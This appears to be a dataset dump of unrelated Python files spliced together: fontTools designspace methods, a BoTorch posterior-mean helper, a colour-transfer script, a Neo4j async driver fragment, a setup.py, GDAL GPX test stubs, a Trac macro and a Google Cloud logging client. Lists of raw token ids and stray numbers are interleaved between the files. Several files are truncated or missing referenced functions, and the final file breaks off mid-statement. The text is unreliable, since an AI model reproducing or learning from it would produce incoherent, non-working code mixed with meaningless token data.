""" rule = self.writerClass.ruleDescriptorClass(**kwargs) self.addRule(rule) return rule def addVariableFont(self, variableFontDescriptor: VariableFontDescriptor): """Add the given ``variableFontDescriptor`` to :attr:`variableFonts`. .. versionadded:: 5.0 """ self.variableFonts.append(variableFontDescriptor) def addVariableFontDescriptor(self, **kwargs): """Instantiate a new :class:`VariableFontDescriptor` using the given ``kwargs`` and add it to :attr:`variableFonts`. .. versionadded:: 5.0 """ variableFont = self.writerClass.variableFontDescriptorClass(**kwargs) self.addVariableFont(variableFont) return variableFont def addLocationLabel(self, locationLabelDescriptor: LocationLabelDescriptor): """Add the given ``locationLabelDescriptor`` to :attr:`locationLabels`. .. versionadded:: 5.0 """ self.locationLabels.append(locationLabelDescriptor) def addLocationLabelDescriptor(self, **kwargs): """Instantiate a new :class:`LocationLabelDescriptor` using the given ``kwargs`` and add it to :attr:`locationLabels`. .. versionadded:: 5.0 """ locationLabel = self.writerClass.locationLabelDescriptorClass(**kwargs) self.addLocationLabel(locationLabel) return locationLabel def newDefaultLocation(self): """Return a dict with the default location in design space coordinates.""" # Without OrderedDict, output XML would be non-deterministic. # https://github.com/LettError/designSpaceDocument/issues/10 loc = collections.OrderedDict() for axisDescriptor in self.axes: loc[axisDescriptor.name] = axisDescriptor.map_forward( axisDescriptor.default ) return loc def labelForUserLocation(self, userLocation: SimpleLocationDict) -> Optional[LocationLabelDescriptor]: """Return the :class:`LocationLabel` that matches the given ``userLocation``, or ``None`` if no such label exists. .. versionadded:: 5.0 """ return next( (label for label in self.locationLabels if label.userLocation == userLocation), None ) def updateFilenameFromPath(self, masters=True, instances=True, force=False): """Set a descriptor filename attr from the path and this document path. If the filename attribute is not None: skip it. """ if masters: for descriptor in self.sources: if descriptor.filename is not None and not force: continue if self.path is not None: descriptor.filename = self._posixRelativePath(descriptor.path) if instances: for descriptor in self.instances: if descriptor.filename is not None and not force: continue if self.path is not None: descriptor.filename = self._posixRelativePath(descriptor.path) def newAxisDescriptor(self): """Ask the writer class to make us a new axisDescriptor.""" return self.writerClass.getAxisDecriptor() def newSourceDescriptor(self): """Ask the writer class to make us a new sourceDescriptor.""" return self.writerClass.getSourceDescriptor() def newInstanceDescriptor(self): """Ask the writer class to make us a new instanceDescriptor.""" return self.writerClass.getInstanceDescriptor() def getAxisOrder(self): """Return a list of axis names, in the same order as defined in the document.""" names = [] for axisDescriptor in self.axes: names.append(axisDescriptor.name) return names def getAxis(self, name): """Return the axis with the given ``name``, or ``None`` if no such axis exists.""" for axisDescriptor in self.axes: if axisDescriptor.name == name: return axisDescriptor return None def getLocationLabel(self, name: str) -> Optional[LocationLabelDescriptor]: """Return the top-level location label with the given ``name``, or ``None`` if no such label exists. .. 
versionadded:: 5.0 """ for label in self.locationLabels: if label.name == name: return label return None def map_forward(self, userLocation: SimpleLocationDict) -> SimpleLocationDict: """Map a user location to a design location. Assume that missing coordinates are at the default location for that axis. Note: the output won't be anisotropic, only the xvalue is set. .. versionadded:: 5.0 """ return { axis.name: axis.map_forward(userLocation.get(axis.name, axis.default)) for axis in self.axes } def map_backward(self, designLocation: AnisotropicLocationDict) -> SimpleLocationDict: """Map a design location to a user location. Assume that missing coordinates are at the default location for that axis. When the input has anisotropic locations, only the xvalue is used. .. versionadded:: 5.0 """ return { axis.name: ( axis.map_backward(designLocation[axis.name]) if axis.name in designLocation else axis.default ) for axis in self.axes } def findDefault(self): """Set and return SourceDescriptor at the default location or None. The default location is the set of all `default` values in user space of all axes. This function updates the document's :attr:`default` value. .. versionchanged:: 5.0 Allow the default source to not specify some of the axis values, and they are assumed to be the default. See :meth:`SourceDescriptor.getFullDesignLocation()` """ self.default = None # Convert the default location from user space to design space before comparing # it against the SourceDescriptor locations (always in design space). defaultDesignLocation = self.newDefaultLocation() for sourceDescriptor in self.sources: if sourceDescriptor.getFullDesignLocation(self) == defaultDesignLocation: self.default = sourceDescriptor return sourceDescriptor return None def normalizeLocation(self, location): """Return a dict with normalized axis values.""" from fontTools.varLib.models import normalizeValue new = {} for axis in self.axes: if axis.name not in location: # skipping this dimension it seems continue value = location[axis.name] # 'anisotropic' location, take first coord only if isinstance(value, tuple): value = value[0] triple = [ axis.map_forward(v) for v in (axis.minimum, axis.default, axis.maximum) ] new[axis.name] = normalizeValue(value, triple) return new def normalize(self): """ Normalise the geometry of this designspace: - scale all the locations of all masters and instances to the -1 - 0 - 1 value. - we need the axis data to do the scaling, so we do those last. 
""" # masters for item in self.sources: item.location = self.normalizeLocation(item.location) # instances for item in self.instances: # glyph masters for this instance for _, glyphData in item.glyphs.items(): glyphData['instanceLocation'] = self.normalizeLocation(glyphData['instanceLocation']) for glyphMaster in glyphData['masters']: glyphMaster['location'] = self.normalizeLocation(glyphMaster['location']) item.location = self.normalizeLocation(item.location) # the axes for axis in self.axes: # scale the map first newMap = [] for inputValue, outputValue in axis.map: newOutputValue = self.normalizeLocation({axis.name: outputValue}).get(axis.name) newMap.append((inputValue, newOutputValue)) if newMap: axis.map = newMap # finally the axis values minimum = self.normalizeLocation({axis.name: axis.minimum}).get(axis.name) maximum = self.normalizeLocation({axis.name: axis.maximum}).get(axis.name) default = self.normalizeLocation({axis.name: axis.default}).get(axis.name) # and set them in the axis.minimum axis.minimum = minimum axis.maximum = maximum axis.default = default # now the rules for rule in self.rules: newConditionSets = [] for conditions in rule.conditionSets: newConditions = [] for cond in conditions: if cond.get('minimum') is not None: minimum = self.normalizeLocation({cond['name']: cond['minimum']}).get(cond['name']) else: minimum = None if cond.get('maximum') is not None: maximum = self.normalizeLocation({cond['name']: cond['maximum']}).get(cond['name']) else: maximum = None newConditions.append(dict(name=cond['name'], minimum=minimum, maximum=maximum)) newConditionSets.append(newConditions) rule.conditionSets = newConditionSets def loadSourceFonts(self, opener, **kwargs): """Ensure SourceDescriptor.font attributes are loaded, and return list of fonts. Takes a callable which initializes a new font object (e.g. TTFont, or defcon.Font, etc.) from the SourceDescriptor.path, and sets the SourceDescriptor.font attribute. If the font attribute is already not None, it is not loaded again. Fonts with the same path are only loaded once and shared among SourceDescriptors. For example, to load UFO sources using defcon: designspace = DesignSpaceDocument.fromfile("path/to/my.designspace") designspace.loadSourceFonts(defcon.Font) Or to load masters as FontTools binary fonts, including extra options: designspace.loadSourceFonts(ttLib.TTFont, recalcBBoxes=False) Args: opener (Callable): takes one required positional argument, the source.path, and an optional list of keyword arguments, and returns a new font object loaded from the path. **kwargs: extra options passed on to the opener function. Returns: List of font objects in the order they appear in the sources list. """ # we load fonts with the same source.path only once loaded = {} fonts = [] for source in self.sources: if source.font is not None: # font already loaded fonts.append(source.font) continue if source.path in loaded: source.font = loaded[source.path] else: if source.path is None: raise DesignSpaceDocumentError( "Designspace source '%s' has no 'path' attribute" % (source.name or "<Unknown>") ) source.font = opener(source.path, **kwargs) loaded[source.path] = source.font fonts.append(source.font) return fonts def getVariableFonts(self) -> List[VariableFontDescriptor]: """Return all variable fonts defined in this document, or implicit variable fonts that can be built from the document's continuous axes. 
In the case of Designspace documents before version 5, the whole document was implicitly describing a variable font that covers the whole space. In version 5 and above documents, there can be as many variable fonts as there are locations on discrete axes. .. seealso:: :func:`splitInterpolable` .. versionadded:: 5.0 """ if self.variableFonts: return self.variableFonts variableFonts = [] discreteAxes = [] rangeAxisSubsets: List[Union[RangeAxisSubsetDescriptor, ValueAxisSubsetDescriptor]] = [] for axis in self.axes: if isinstance(axis, DiscreteAxisDescriptor): discreteAxes.append(axis) else: rangeAxisSubsets.append(RangeAxisSubsetDescriptor(name=axis.name)) valueCombinations = itertools.product(*[axis.values for axis in discreteAxes]) for values in valueCombinations: basename = None if self.filename is not None: basename = os.path.splitext(self.filename)[0] + "-VF" if self.path is not None: basename = os.path.splitext(os.path.basename(self.path))[0] + "-VF" if basename is None: basename = "VF" axisNames = "".join([f"-{axis.tag}{value}" for axis, value in zip(discreteAxes, values)]) variableFonts.append(VariableFontDescriptor( name=f"{basename}{axisNames}", axisSubsets=rangeAxisSubsets + [ ValueAxisSubsetDescriptor(name=axis.name, userValue=value) for axis, value in zip(discreteAxes, values) ] )) return variableFonts def deepcopyExceptFonts(self): """Allow deep-copying a DesignSpace document without deep-copying attached UFO fonts or TTFont objects. The :attr:`font` attribute is shared by reference between the original and the copy. .. versionadded:: 5.0 """ fonts = [source.font for source in self.sources] try: for source in self.sources: source.font = None res = copy.deepcopy(self) for source, font in zip(res.sources, fonts): res.font = font return res finally: for source, font in zip(self.sources, fonts): source.font = font
[ 6738, 11593, 37443, 834, 1330, 37647, 198, 198, 11748, 17268, 198, 11748, 4866, 198, 11748, 340, 861, 10141, 198, 11748, 10688, 198, 11748, 28686, 198, 11748, 1426, 844, 6978, 198, 6738, 33245, 1330, 2750, 4879, 9399, 11, 10903, 9399, 198...
2.368076
20,129
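The designspaceLib sample above centres on the descriptor API (addAxisDescriptor, addSourceDescriptor, addInstanceDescriptor, findDefault, normalizeLocation). A minimal usage sketch follows; the axis values, family name and UFO file names are made up for illustration.

from fontTools.designspaceLib import DesignSpaceDocument

doc = DesignSpaceDocument()
doc.addAxisDescriptor(
    name="Weight", tag="wght", minimum=100, default=400, maximum=900
)
doc.addSourceDescriptor(filename="MyFont-Regular.ufo", location={"Weight": 400})
doc.addSourceDescriptor(filename="MyFont-Bold.ufo", location={"Weight": 900})
doc.addInstanceDescriptor(
    familyName="MyFont", styleName="Medium", location={"Weight": 500}
)

# the Regular source sits at the default design location
print(doc.findDefault())
# design-space value 900 normalizes to 1.0 on a 100/400/900 axis
print(doc.normalizeLocation({"Weight": 900}))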
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from typing import Any, Optional, Tuple import torch from botorch.acquisition.acquisition import AcquisitionFunction from botorch.acquisition.monte_carlo import qSimpleRegret from botorch.acquisition.objective import ConstrainedMCObjective, GenericMCObjective from botorch.acquisition.utils import get_infeasible_cost from botorch.models.model import Model from botorch.utils import ( get_objective_weights_transform, get_outcome_constraint_transforms, ) from botorch.utils.multi_objective.scalarization import get_chebyshev_scalarization from botorch.utils.transforms import squeeze_last_dim from torch import Tensor def get_PosteriorMean( model: Model, objective_weights: Tensor, outcome_constraints: Optional[Tuple[Tensor, Tensor]] = None, X_observed: Optional[Tensor] = None, X_pending: Optional[Tensor] = None, **kwargs: Any, ) -> AcquisitionFunction: r"""Instantiates a PosteriorMean acquisition function. Note: If no OutcomeConstraints given, return an analytic acquisition function. This requires {optimizer_kwargs: {joint_optimization: True}} or an optimizer that does not assume pending point support. Args: objective_weights: The objective is to maximize a weighted sum of the columns of f(x). These are the weights. outcome_constraints: A tuple of (A, b). For k outcome constraints and m outputs at f(x), A is (k x m) and b is (k x 1) such that A f(x) <= b. (Not used by single task models) X_observed: A tensor containing points observed for all objective outcomes and outcomes that appear in the outcome constraints (if there are any). X_pending: A tensor containing points whose evaluation is pending (i.e. that have been submitted for evaluation) present for all objective outcomes and outcomes that appear in the outcome constraints (if there are any). Returns: PosteriorMean: The instantiated acquisition function. """ if X_observed is None: raise ValueError("There are no feasible observed points.") # construct Objective module if kwargs.get("chebyshev_scalarization", False): obj_tf = get_chebyshev_scalarization( weights=objective_weights, Y=squeeze_last_dim(torch.stack(kwargs.get("Ys")).transpose(0, 1)), ) else: obj_tf = get_objective_weights_transform(objective_weights) if outcome_constraints is None: objective = GenericMCObjective(objective=obj_tf) else: con_tfs = get_outcome_constraint_transforms(outcome_constraints) inf_cost = get_infeasible_cost(X=X_observed, model=model, objective=obj_tf) objective = ConstrainedMCObjective( objective=obj_tf, constraints=con_tfs or [], infeasible_cost=inf_cost ) # Use qSimpleRegret, not analytic posterior, to handle arbitrary objective fns. acq_func = qSimpleRegret(model, objective=objective) return acq_func
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 15069, 357, 66, 8, 3203, 11, 3457, 13, 290, 663, 29116, 13, 198, 2, 198, 2, 770, 2723, 2438, 318, 11971, 739, 262, 17168, 5964, 1043, 287, 262, 198, 2, 38559, 24290, 2393, ...
2.7773
1,163
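The get_PosteriorMean helper above wraps a model and objective weights into a qSimpleRegret acquisition function. A hedged usage sketch, with an invented SingleTaskGP surrogate and random training data, could look like this; only the call pattern matters, not the numbers.

import torch
from botorch.models import SingleTaskGP

# toy training data: 8 points in 2 dimensions, scalar outcome
train_X = torch.rand(8, 2, dtype=torch.double)
train_Y = train_X.sum(dim=-1, keepdim=True)
model = SingleTaskGP(train_X, train_Y)

acqf = get_PosteriorMean(
    model=model,
    objective_weights=torch.tensor([1.0], dtype=torch.double),
    X_observed=train_X,
)

# qSimpleRegret expects candidates shaped (batch, q, d)
value = acqf(train_X[:1].unsqueeze(0))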
# Copyright 2018 the Autoware Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Co-developed by Tier IV, Inc. and Apex.AI, Inc. import ament_index_python import launch import launch.actions import launch_ros.actions import lidar_integration # Test cases are created automatically by the lidar_integration package. We just need to # instantiate them active = lidar_integration.make_active_tests() after_shutdown = lidar_integration.make_post_shutdown_tests()
[ 2, 15069, 2864, 262, 5231, 322, 533, 5693, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 2, ...
3.671698
265
# USAGE
# python example.py --source images/ocean_sunset.jpg --target images/ocean_day.jpg

# import the necessary packages
from color_transfer import color_transfer
import numpy as np
import argparse
import cv2

def show_image(title, image):
    # minimal stand-in for the display helper used below
    # (assumed; the original script defines its own version)
    cv2.imshow(title, image)

# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-s", "--source", required = True,
    help = "Path to the source image")
ap.add_argument("-t", "--target", required = True,
    help = "Path to the target image")
ap.add_argument("-o", "--output", help = "Path to the output image (optional)")
args = vars(ap.parse_args())

# load the images
source = cv2.imread(args["source"])
target = cv2.imread(args["target"])

# transfer the color distribution from the source image
# to the target image
transfer = color_transfer(source, target)

# check to see if the output image should be saved
if args["output"] is not None:
    cv2.imwrite(args["output"], transfer)

# show the images and wait for a key press
show_image("Source", source)
show_image("Target", target)
show_image("Transfer", transfer)
cv2.waitKey(0)
[ 2, 1294, 11879, 198, 2, 21015, 1672, 13, 9078, 1377, 10459, 4263, 14, 78, 5829, 62, 19155, 2617, 13, 9479, 1377, 16793, 4263, 14, 78, 5829, 62, 820, 13, 9479, 198, 198, 2, 1330, 262, 3306, 10392, 198, 6738, 3124, 62, 39437, 1330, ...
3.259939
327
import copy

import numpy as np
import open3d as o3d
from tqdm import tqdm
from scipy import stats

import utils_o3d as utils


if __name__ == '__main__':
    run()
[ 11748, 4866, 198, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 1280, 18, 67, 355, 267, 18, 67, 198, 6738, 256, 80, 36020, 1330, 256, 80, 36020, 198, 6738, 629, 541, 88, 1330, 9756, 198, 198, 11748, 3384, 4487, 62, 78, 18, 67, 3...
2.4
75
#!/usr/bin/env python # -*- encoding: utf-8 -*- # Copyright (c) 2002-2019 "Neo4j," # Neo4j Sweden AB [http://neo4j.com] # # This file is part of Neo4j. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from asyncio import ( IncompleteReadError, Lock, StreamReader, StreamReaderProtocol, StreamWriter, get_event_loop, wait, ) from collections import deque from logging import getLogger from os import strerror from random import choice from ssl import SSLError from sys import platform, version_info from time import perf_counter from neo4j.addressing import Address from neo4j.aio._collections import WaitingList from neo4j.aio._mixins import Addressable, Breakable from neo4j.errors import ( BoltError, BoltConnectionError, BoltSecurityError, BoltConnectionBroken, BoltHandshakeError, Neo4jAvailabilityError, ) from neo4j.api import Version from neo4j.conf import Config, PoolConfig from neo4j.meta import version as neo4j_version from neo4j.routing import RoutingTable log = getLogger(__name__) MAGIC = b"\x60\x60\xB0\x17" async def close(self): """ Close the connection. """ if self.closed: return if not self.broken: log.debug("[#%04X] S: <HANGUP>", self.local_address.port_number) self.__writer.write_eof() self.__writer.close() try: await self.__writer.wait_closed() except BoltConnectionBroken: pass self.__closed = True # async def main(): # from neo4j.debug import watch; watch("neo4j") # neo4j = await Neo4j.open(":17601 :17602 :17603", auth=("neo4j", "password")) # await neo4j.update_routing_table() # print(neo4j.routing_table) # # # if __name__ == "__main__": # run(main())
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 21004, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 2, 15069, 357, 66, 8, 6244, 12, 23344, 366, 8199, 78, 19, 73, 553, 198, 2, 21227, 19, 73, 10710, 9564, 685, ...
2.626697
884
import os import imp from setuptools import setup, find_packages __version__ = imp.load_source( "hsfs.version", os.path.join("hsfs", "version.py") ).__version__ setup( name="hsfs", version=__version__, install_requires=[ "pyhumps==1.6.1", "requests", "furl", "boto3", "pandas", "numpy", "pyjks", "mock", "avro==1.10.2", "sqlalchemy", "PyMySQL", ], extras_require={ "dev": [ "pytest", "flake8", "black"], "docs": [ "mkdocs==1.1.2", "mkdocs-material==6.2.2", "mike==0.5.5", "sphinx==3.5.4", "keras_autodoc @ git+https://git@github.com/moritzmeister/keras-autodoc@split-tags-properties", "markdown-include"], "hive": ["pyhopshive[thrift]"] }, author="Logical Clocks AB", author_email="moritz@logicalclocks.com", description="HSFS: An environment independent client to interact with the Hopsworks Featurestore", license="Apache License 2.0", keywords="Hopsworks, Feature Store, Spark, Machine Learning, MLOps, DataOps", url="https://github.com/logicalclocks/feature-store-api", download_url="https://github.com/logicalclocks/feature-store-api/releases/tag/" + __version__, packages=find_packages(), long_description=read("../README.md"), long_description_content_type="text/markdown", classifiers=[ "Development Status :: 5 - Production/Stable", "Topic :: Utilities", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3", "Intended Audience :: Developers", ], )
[ 11748, 28686, 198, 11748, 848, 198, 6738, 900, 37623, 10141, 1330, 9058, 11, 1064, 62, 43789, 628, 198, 834, 9641, 834, 796, 848, 13, 2220, 62, 10459, 7, 198, 220, 220, 220, 366, 11994, 9501, 13, 9641, 1600, 28686, 13, 6978, 13, 221...
2.17207
802
#!/usr/bin/env python3

from . import signup, signin, signout, update, info, detail
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 201, 198, 201, 198, 6738, 764, 1330, 1051, 929, 11, 1051, 259, 11, 1051, 448, 11, 4296, 11, 7508, 11, 3703, 201, 198 ]
2.71875
32
# Optional list of dependencies required by the package
dependencies = ['torch']

from focal_loss import FocalLoss, focal_loss
[ 2, 32233, 1351, 286, 20086, 2672, 416, 262, 5301, 198, 45841, 3976, 796, 37250, 13165, 354, 20520, 198, 198, 6738, 25397, 62, 22462, 1330, 376, 4374, 43, 793, 11, 25397, 62, 22462, 198 ]
3.848485
33
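The hub entry above only re-exports FocalLoss and focal_loss from the package. Independent of that package's actual API, a minimal binary focal-loss computation in plain PyTorch looks roughly like this; the alpha/gamma defaults are the commonly used values, not necessarily the package's.

import torch
import torch.nn.functional as F

def binary_focal_loss(logits, targets, alpha=0.25, gamma=2.0):
    # per-element BCE, then down-weight easy examples by (1 - p_t)^gamma
    bce = F.binary_cross_entropy_with_logits(logits, targets, reduction="none")
    p_t = torch.exp(-bce)  # probability assigned to the true class
    alpha_t = alpha * targets + (1 - alpha) * (1 - targets)
    return (alpha_t * (1 - p_t) ** gamma * bce).mean()

loss = binary_focal_loss(torch.randn(4), torch.tensor([1.0, 0.0, 1.0, 0.0]))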
#!/usr/bin/env python ############################################################################### # $Id$ # # Project: GDAL/OGR Test Suite # Purpose: Test GPX driver functionality. # Author: Even Rouault <even dot rouault at mines dash paris dot org> # ############################################################################### # Copyright (c) 2007, Even Rouault <even dot rouault at mines dash paris dot org> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. ############################################################################### import os import sys import string sys.path.append( '../pymod' ) import gdaltest import ogrtest import ogr import osr import gdal ############################################################################### # Test waypoints gpx layer. ############################################################################### # Test routes gpx layer. ############################################################################### # Test route_points gpx layer. ############################################################################### # Test tracks gpx layer. ############################################################################### # Test route_points gpx layer. ############################################################################### # Copy our small gpx file to a new gpx file. ############################################################################### # Output extra fields as <extensions>. ############################################################################### # Output extra fields as <extensions>. ############################################################################### # gdaltest_list = [ ogr_gpx_init, ogr_gpx_1, ogr_gpx_2, ogr_gpx_3, ogr_gpx_4, ogr_gpx_5, ogr_gpx_6, # Rerun test 1, 2 and 4 with generated tmp/tmp.gpx ogr_gpx_1, ogr_gpx_2, ogr_gpx_4, ogr_gpx_7, ogr_gpx_8, ogr_gpx_cleanup ] if __name__ == '__main__': gdaltest.setup_run( 'ogr_gpx' ) gdaltest.run_tests( gdaltest_list ) gdaltest.summarize()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 29113, 29113, 7804, 4242, 21017, 198, 2, 720, 7390, 3, 198, 2, 198, 2, 4935, 25, 220, 27044, 1847, 14, 49656, 6208, 26264, 198, 2, 32039, 25, 220, 6208, 14714, 55, 4639, 11244, 13, ...
3.754237
826
# Code Taken from https://github.com/LYH-YF/MWPToolkit
# -*- encoding: utf-8 -*-
# @Author: Yihuai Lan
# @Time: 2021/08/21 04:59:55
# @File: sausolver.py

import random
import torch
from torch import nn
import copy

from module.Encoder.rnn_encoder import BasicRNNEncoder
from module.Embedder.basic_embedder import BasicEmbedder
from module.Decoder.tree_decoder import SARTreeDecoder
from module.Layer.tree_layers import NodeGenerater, SubTreeMerger, TreeNode, TreeEmbedding
from module.Layer.tree_layers import Prediction, GenerateNode, Merge, SemanticAlignmentModule
from module.Strategy.beam_search import TreeBeam
from loss.masked_cross_entropy_loss import MaskedCrossEntropyLoss, masked_cross_entropy
from loss.mse_loss import MSELoss
from utils.utils import copy_list
from utils.enum_type import NumMask, SpecialTokens
[ 2, 6127, 30222, 422, 3740, 1378, 12567, 13, 785, 14, 11319, 39, 12, 56, 37, 14, 14326, 11571, 970, 15813, 198, 2, 532, 9, 12, 21004, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 2488, 13838, 25, 575, 48406, 1872, 14730, 198, 2, 2...
3.089888
267
import unittest
from functools import partial

import pandas as pd
from pandas.util.testing import assert_frame_equal, assert_series_equal
import numpy as np
import threading
from StringIO import StringIO

from rosetta.parallel import parallel_easy, pandas_easy
from rosetta.parallel.threading_easy import threading_easy, LockIterateApply


# A couple functions for testing parallel easy
# Must be defined outside of the test class for some reason.
abfunc = partial(_abfunc, 2, 3)

[ 11748, 555, 715, 395, 198, 6738, 1257, 310, 10141, 1330, 13027, 198, 198, 11748, 19798, 292, 355, 279, 67, 198, 6738, 19798, 292, 13, 22602, 13, 33407, 1330, 6818, 62, 14535, 62, 40496, 11, 6818, 62, 25076, 62, 40496, 198, 11748, 299,...
3.517986
139
import time
import srt
import re
import datetime
from mqtthandler import MQTTHandler

INIT_STATUS = {
    "video": {
        "title": None,
        "series_title": None,
        "season": None,
        "episode": None
    },
    "time": None,
    "events": None
}
[ 11748, 640, 198, 11748, 264, 17034, 198, 11748, 302, 198, 11748, 4818, 8079, 198, 6738, 285, 39568, 400, 392, 1754, 1330, 337, 48, 51, 4221, 392, 1754, 198, 198, 1268, 2043, 62, 35744, 2937, 34758, 198, 220, 220, 220, 366, 15588, 1298...
2.165289
121
#!/usr/bin/env python

import os
import numpy as np
import pandas as pd

os.getcwd()

# Request for the filename
# Current version of this script works only with TSV type files
mainFilename = input('Input your file name (diabetes.tab.txt or housing.data.txt): ')
print()

# To create a proper dataframe, transform it with numpy,
# then convert it with pandas
filenameData = np.genfromtxt(mainFilename, dtype='str')
filenameData = pd.DataFrame(filenameData)

# Obtains the first row to identify whether the header is string or numeric
headers = filenameData.iloc[0]
try:
    pd.to_numeric(headers)
except (ValueError, TypeError):
    filenameData = pd.DataFrame(filenameData.values[1:], columns=headers)

# Changes strings to numbers (self identifies for float or integer)
filenameData = filenameData.apply(pd.to_numeric)

# Obtains the mean and standard deviation of the columns
listMean = filenameData.mean()
listStd = filenameData.std()
print(filenameData)

# Prints out the results
print('Mean for each column:')
for idx in filenameData.columns:
    print(idx, ':', listMean[idx])
print()

print('Standard deviation for each column:')
for idx in filenameData.columns:
    print(idx, ':', listStd[idx])
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 28686, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 418, 13, 1136, 66, 16993, 3419, 198, 198, 2, 19390, 329, 262, 29472, 198, 2, 92...
3.148649
370
from donkeycar.parts.web_controller.web import WebSocketCalibrateAPI
from functools import partial

from tornado import testing
import tornado.websocket
import tornado.web
import tornado.ioloop
import json
from unittest.mock import Mock

from donkeycar.parts.actuator import PWMSteering, PWMThrottle
[ 198, 6738, 50085, 7718, 13, 42632, 13, 12384, 62, 36500, 13, 12384, 1330, 5313, 39105, 9771, 2889, 378, 17614, 198, 6738, 1257, 310, 10141, 1330, 13027, 198, 198, 6738, 33718, 1330, 4856, 198, 11748, 33718, 13, 732, 1443, 5459, 198, 117...
3.541176
85
# TracIncludeMacro macros
import re
import urllib2
from StringIO import StringIO

from trac.core import *
from trac.wiki.macros import WikiMacroBase
from trac.wiki.formatter import system_message
from trac.wiki.model import WikiPage
from trac.mimeview.api import Mimeview, get_mimetype, Context
from trac.perm import IPermissionRequestor
from genshi.core import escape
from genshi.input import HTMLParser, ParseError
from genshi.filters.html import HTMLSanitizer

__all__ = ['IncludeMacro']
[ 2, 833, 330, 818, 9152, 14155, 305, 34749, 198, 11748, 302, 198, 11748, 2956, 297, 571, 17, 198, 6738, 10903, 9399, 1330, 10903, 9399, 198, 198, 6738, 491, 330, 13, 7295, 1330, 1635, 198, 6738, 491, 330, 13, 15466, 13, 20285, 4951, ...
2.776596
188
# Copyright 2016 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Client for interacting with the Google Stackdriver Logging API.""" import os try: from google.cloud.gapic.logging.v2.config_service_v2_api import ( ConfigServiceV2Api as GeneratedSinksAPI) from google.cloud.gapic.logging.v2.logging_service_v2_api import ( LoggingServiceV2Api as GeneratedLoggingAPI) from google.cloud.gapic.logging.v2.metrics_service_v2_api import ( MetricsServiceV2Api as GeneratedMetricsAPI) from google.cloud.logging._gax import _LoggingAPI as GAXLoggingAPI from google.cloud.logging._gax import _MetricsAPI as GAXMetricsAPI from google.cloud.logging._gax import _SinksAPI as GAXSinksAPI except ImportError: # pragma: NO COVER _HAVE_GAX = False GeneratedLoggingAPI = GAXLoggingAPI = None GeneratedMetricsAPI = GAXMetricsAPI = None GeneratedSinksAPI = GAXSinksAPI = None else: _HAVE_GAX = True from google.cloud.client import JSONClient from google.cloud.environment_vars import DISABLE_GRPC from google.cloud.logging.connection import Connection from google.cloud.logging.connection import _LoggingAPI as JSONLoggingAPI from google.cloud.logging.connection import _MetricsAPI as JSONMetricsAPI from google.cloud.logging.connection import _SinksAPI as JSONSinksAPI from google.cloud.logging.entries import ProtobufEntry from google.cloud.logging.entries import StructEntry from google.cloud.logging.entries import TextEntry from google.cloud.logging.logger import Logger from google.cloud.logging.metric import Metric from google.cloud.logging.sink import Sink _DISABLE_GAX = os.getenv(DISABLE_GRPC, False) _USE_GAX = _HAVE_GAX and not _DISABLE_GAX def _entry_from_resource(self, resource, loggers): """Detect correct entry type from resource and instantiate. :type resource: dict :param resource: one entry resource from API response :type loggers: dict or None :param loggers: A mapping of logger fullnames -> loggers. If not passed, the entry will have a newly-created logger. :rtype: One of: :class:`google.cloud.logging.entries.TextEntry`, :class:`google.cloud.logging.entries.StructEntry`, :class:`google.cloud.logging.entries.ProtobufEntry` :returns: the entry instance, constructed via the resource """ if 'textPayload' in resource: return TextEntry.from_api_repr(resource, self, loggers) elif 'jsonPayload' in resource: return StructEntry.from_api_repr(resource, self, loggers) elif 